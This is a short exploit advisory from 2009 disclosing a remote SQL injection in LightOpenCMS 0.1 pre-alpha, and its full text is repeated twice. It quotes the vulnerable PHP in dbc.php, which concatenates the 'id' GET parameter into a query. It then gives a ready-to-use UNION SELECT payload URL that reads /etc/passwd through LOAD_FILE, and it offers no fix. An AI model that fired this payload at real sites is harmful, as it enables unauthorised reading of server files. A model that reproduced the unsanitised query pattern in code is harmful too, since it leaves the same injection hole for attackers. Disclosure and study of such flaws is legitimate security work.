******** Salvatore "drosophila" Fresta ******** [+] Application: LightOpenCMS [+] Version: 0.1 pre-alpha [+] Website: http://sourceforge.net/projects/lightopencms [+] Bugs: [A] Remote SQL Injection [+] Exploitation: Remote [+] Date: 05 Jun 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs - [A] Remote SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: dbc.php This bug allows a guest to inject arbitrary SQL statments. ... if (isset($_GET['id'])) { $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'"); return mysql_fetch_assoc($result); ... *************************************************** [+] Code - [A] Remote SQL Injection http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23 *************************************************** [+] Fix No fix. *************************************************** -- Salvatore Fresta aka drosophila CWNP444351
******** Salvatore "drosophila" Fresta ******** [+] Application: LightOpenCMS [+] Version: 0.1 pre-alpha [+] Website: http://sourceforge.net/projects/lightopencms [+] Bugs: [A] Remote SQL Injection [+] Exploitation: Remote [+] Date: 05 Jun 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs - [A] Remote SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: dbc.php This bug allows a guest to inject arbitrary SQL statments. ... if (isset($_GET['id'])) { $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'"); return mysql_fetch_assoc($result); ... *************************************************** [+] Code - [A] Remote SQL Injection http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23 *************************************************** [+] Fix No fix. ***************************************************